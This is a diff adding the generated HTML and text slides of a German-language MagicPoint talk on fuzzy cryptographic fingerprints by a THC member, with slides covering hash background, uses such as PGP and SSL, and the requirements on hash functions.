+/mgp00030.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00030.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00031.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00031.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00031.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00031.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00032.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00032.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00032.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00032.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00033.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00033.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00033.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00033.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00034.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00034.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00034.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00034.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00035.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00035.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00035.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00035.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00036.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00036.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00036.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00036.txt/1.1/Thu Mar 11 12:50:59 2004//
+D

Presentations/ffp-talk/CVS/Repository

@@ -0,0 +1 @@
+thc-www/papers/ffp-talk

Presentations/ffp-talk/CVS/Root

@@ -0,0 +1 @@
+vh@bh.segfault.net:/home/thc/thccvs/cvs

Presentations/ffp-talk/index.html

@@ -0,0 +1,43 @@
+<HTML>
+<HEAD><TITLE>MagicPoint presentation foils</TITLE></HEAD>
+<BODY>
+<A HREF="mgp00001.html"><IMG SRC="mgp00001.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 1"></A>
+<A HREF="mgp00002.html"><IMG SRC="mgp00002.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 2"></A>
+<A HREF="mgp00003.html"><IMG SRC="mgp00003.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 3"></A>
+<A HREF="mgp00004.html"><IMG SRC="mgp00004.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 4"></A>
+<A HREF="mgp00005.html"><IMG SRC="mgp00005.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 5"></A>
+<A HREF="mgp00006.html"><IMG SRC="mgp00006.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 6"></A>
+<A HREF="mgp00007.html"><IMG SRC="mgp00007.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 7"></A>
+<A HREF="mgp00008.html"><IMG SRC="mgp00008.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 8"></A>
+<A HREF="mgp00009.html"><IMG SRC="mgp00009.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 9"></A>
+<A HREF="mgp00010.html"><IMG SRC="mgp00010.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 10"></A>
+<A HREF="mgp00011.html"><IMG SRC="mgp00011.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 11"></A>
+<A HREF="mgp00012.html"><IMG SRC="mgp00012.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 12"></A>
+<A HREF="mgp00013.html"><IMG SRC="mgp00013.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 13"></A>
+<A HREF="mgp00014.html"><IMG SRC="mgp00014.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 14"></A>
+<A HREF="mgp00015.html"><IMG SRC="mgp00015.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 15"></A>
+<A HREF="mgp00016.html"><IMG SRC="mgp00016.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 16"></A>
+<A HREF="mgp00017.html"><IMG SRC="mgp00017.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 17"></A>
+<A HREF="mgp00018.html"><IMG SRC="mgp00018.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 18"></A>
+<A HREF="mgp00019.html"><IMG SRC="mgp00019.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 19"></A>
+<A HREF="mgp00020.html"><IMG SRC="mgp00020.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 20"></A>
+<A HREF="mgp00021.html"><IMG SRC="mgp00021.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 21"></A>
+<A HREF="mgp00022.html"><IMG SRC="mgp00022.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 22"></A>
+<A HREF="mgp00023.html"><IMG SRC="mgp00023.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 23"></A>
+<A HREF="mgp00024.html"><IMG SRC="mgp00024.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 24"></A>
+<A HREF="mgp00025.html"><IMG SRC="mgp00025.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 25"></A>
+<A HREF="mgp00026.html"><IMG SRC="mgp00026.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 26"></A>
+<A HREF="mgp00027.html"><IMG SRC="mgp00027.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 27"></A>
+<A HREF="mgp00028.html"><IMG SRC="mgp00028.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 28"></A>
+<A HREF="mgp00029.html"><IMG SRC="mgp00029.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 29"></A>
+<A HREF="mgp00030.html"><IMG SRC="mgp00030.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 30"></A>
+<A HREF="mgp00031.html"><IMG SRC="mgp00031.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 31"></A>
+<A HREF="mgp00032.html"><IMG SRC="mgp00032.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 32"></A>
+<A HREF="mgp00033.html"><IMG SRC="mgp00033.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 33"></A>
+<A HREF="mgp00034.html"><IMG SRC="mgp00034.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 34"></A>
+<A HREF="mgp00035.html"><IMG SRC="mgp00035.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 35"></A>
+<A HREF="mgp00036.html"><IMG SRC="mgp00036.idx.jpg" WIDTH=200 HEIGHT=150 ALT="Page 36"></A>
+<HR>
+Generated by <A HREF="http://www.mew.org/mgp/">MagicPoint</A>
+<BR>
+</BODY></HTML>

Presentations/ffp-talk/mgp00001.html

@@ -0,0 +1,9 @@
+<HTML>
+<HEAD><TITLE>MagicPoint presentation foils</TITLE></HEAD>
+<BODY>
+<A HREF="index.html">[index]</A> <A HREF=mgp00001.txt>[text page]</A> [&lt;&lt;start] [&lt;prev] <A HREF=mgp00002.html>[next&gt;]</A> <A HREF=mgp00036.html>[last&gt;&gt;]</A>
+<BR>Page 1: Unscharfe kryptographische    <BR>
+<HR>
+<IMG SRC="mgp00001.jpg" WIDTH=800 HEIGHT=600 ALT="Page 1"><BR>
+<HR>Generated by <A HREF="http://www.mew.org/mgp/">MagicPoint</A>
+</BODY></HTML>

Presentations/ffp-talk/mgp00001.txt

@@ -0,0 +1,11 @@
+
+
+
+
+
+Unscharfe kryptographische    
+Fingerabdrücke    
+
+          Plasmoid     
+plasmoid@thc.org     
+

Presentations/ffp-talk/mgp00002.html

@@ -0,0 +1,9 @@
+<HTML>
+<HEAD><TITLE>MagicPoint presentation foils</TITLE></HEAD>
+<BODY>
+<A HREF="index.html">[index]</A> <A HREF=mgp00002.txt>[text page]</A> <A HREF=mgp00001.html>[&lt;&lt;start]</A>  <A HREF=mgp00001.html>[&lt;prev]</A> <A HREF=mgp00003.html>[next&gt;]</A> <A HREF=mgp00036.html>[last&gt;&gt;]</A>
+<BR>Page 2: Überblick<BR>
+<HR>
+<IMG SRC="mgp00002.jpg" WIDTH=800 HEIGHT=600 ALT="Page 2"><BR>
+<HR>Generated by <A HREF="http://www.mew.org/mgp/">MagicPoint</A>
+</BODY></HTML>

Presentations/ffp-talk/mgp00002.txt

@@ -0,0 +1,15 @@
+
+Überblick
+
+Kryptographische Fingerabdrücke
+Hintergrund
+Sicherheit
+
+Fuzzy Fingerprints
+Motivation und Idee        
+Qualitätsberechnungen
+
+Beispiel-Implementierung
+SSH2 Schlüsselverifikation
+
+

Presentations/ffp-talk/mgp00003.html

@@ -0,0 +1,9 @@
+<HTML>
+<HEAD><TITLE>MagicPoint presentation foils</TITLE></HEAD>
+<BODY>
+<A HREF="index.html">[index]</A> <A HREF=mgp00003.txt>[text page]</A> <A HREF=mgp00001.html>[&lt;&lt;start]</A>  <A HREF=mgp00002.html>[&lt;prev]</A> <A HREF=mgp00004.html>[next&gt;]</A> <A HREF=mgp00036.html>[last&gt;&gt;]</A>
+<BR>Page 3: kryptographische   <BR>
+<HR>
+<IMG SRC="mgp00003.jpg" WIDTH=800 HEIGHT=600 ALT="Page 3"><BR>
+<HR>Generated by <A HREF="http://www.mew.org/mgp/">MagicPoint</A>
+</BODY></HTML>

Presentations/ffp-talk/mgp00003.txt

@@ -0,0 +1,11 @@
+
+
+
+
+
+
+kryptographische   
+Fingerabdrücke   
+
+
+

Presentations/ffp-talk/mgp00004.html

@@ -0,0 +1,9 @@
+<HTML>
+<HEAD><TITLE>MagicPoint presentation foils</TITLE></HEAD>
+<BODY>
+<A HREF="index.html">[index]</A> <A HREF=mgp00004.txt>[text page]</A> <A HREF=mgp00001.html>[&lt;&lt;start]</A>  <A HREF=mgp00003.html>[&lt;prev]</A> <A HREF=mgp00005.html>[next&gt;]</A> <A HREF=mgp00036.html>[last&gt;&gt;]</A>
+<BR>Page 4: Kryptographische Fingerabdrücke<BR>
+<HR>
+<IMG SRC="mgp00004.jpg" WIDTH=800 HEIGHT=600 ALT="Page 4"><BR>
+<HR>Generated by <A HREF="http://www.mew.org/mgp/">MagicPoint</A>
+</BODY></HTML>

Presentations/ffp-talk/mgp00004.txt

@@ -0,0 +1,11 @@
+
+Kryptographische Fingerabdrücke
+
+Analog zu echten Fingerabdrücken
+Einfache Gewinnung
+Möglichst eindeutige Relation  
+Schwer zu fälschen
+
+Weitere Forderungen
+Wesentlich kürzer als Daten
+

Presentations/ffp-talk/mgp00005.html

@@ -0,0 +1,9 @@
+<HTML>
+<HEAD><TITLE>MagicPoint presentation foils</TITLE></HEAD>
+<BODY>
+<A HREF="index.html">[index]</A> <A HREF=mgp00005.txt>[text page]</A> <A HREF=mgp00001.html>[&lt;&lt;start]</A>  <A HREF=mgp00004.html>[&lt;prev]</A> <A HREF=mgp00006.html>[next&gt;]</A> <A HREF=mgp00036.html>[last&gt;&gt;]</A>
+<BR>Page 5: Einsatzgebiete von Fingerabdrücke<BR>
+<HR>
+<IMG SRC="mgp00005.jpg" WIDTH=800 HEIGHT=600 ALT="Page 5"><BR>
+<HR>Generated by <A HREF="http://www.mew.org/mgp/">MagicPoint</A>
+</BODY></HTML>

Presentations/ffp-talk/mgp00005.txt

@@ -0,0 +1,13 @@
+
+Einsatzgebiete von Fingerabdrücke
+
+Verifikation von
+Nachrichten (PGP)
+Programmen (Tripwire)
+Öffentlichen Schlüsseln (SSL)
+Passwörtern (Unix)
+
+Gängige Algorithmen
+MD5 (128 Bit) von Ron Rivest
+SHA1 (160 Bit) von der NSA
+

Presentations/ffp-talk/mgp00006.html

@@ -0,0 +1,9 @@
+<HTML>
+<HEAD><TITLE>MagicPoint presentation foils</TITLE></HEAD>
+<BODY>
+<A HREF="index.html">[index]</A> <A HREF=mgp00006.txt>[text page]</A> <A HREF=mgp00001.html>[&lt;&lt;start]</A>  <A HREF=mgp00005.html>[&lt;prev]</A> <A HREF=mgp00007.html>[next&gt;]</A> <A HREF=mgp00036.html>[last&gt;&gt;]</A>
+<BR>Page 6: Anforderungen an Fingerabdrücke<BR>
+<HR>
+<IMG SRC="mgp00006.jpg" WIDTH=800 HEIGHT=600 ALT="Page 6"><BR>
+<HR>Generated by <A HREF="http://www.mew.org/mgp/">MagicPoint</A>
+</BODY></HTML>

Presentations/ffp-talk/mgp00006.txt

@@ -0,0 +1,14 @@
+
+Anforderungen an Fingerabdrücke
+
+Einwegfunktionen
+ leicht zu berechnen
+ schwer zu berechnen
+
+Avalanche
+Die Änderung eines Inputbits soll 50% der Outputbits ändern.
+
+Nichtlinearität
+Kein Outputbit hängt linear von einem Inputbit ab
+
+

Presentations/ffp-talk/mgp00007.html

@@ -0,0 +1,9 @@
+<HTML>
+<HEAD><TITLE>MagicPoint presentation foils</TITLE></HEAD>
+<BODY>
+<A HREF="index.html">[index]</A> <A HREF=mgp00007.txt>[text page]</A> <A HREF=mgp00001.html>[&lt;&lt;start]</A>  <A HREF=mgp00006.html>[&lt;prev]</A> <A HREF=mgp00008.html>[next&gt;]</A> <A HREF=mgp00036.html>[last&gt;&gt;]</A>
+<BR>Page 7: Angriffe gegen Fingerabdrücke<BR>
+<HR>
+<IMG SRC="mgp00007.jpg" WIDTH=800 HEIGHT=600 ALT="Page 7"><BR>
+<HR>Generated by <A HREF="http://www.mew.org/mgp/">MagicPoint</A>
+</BODY></HTML>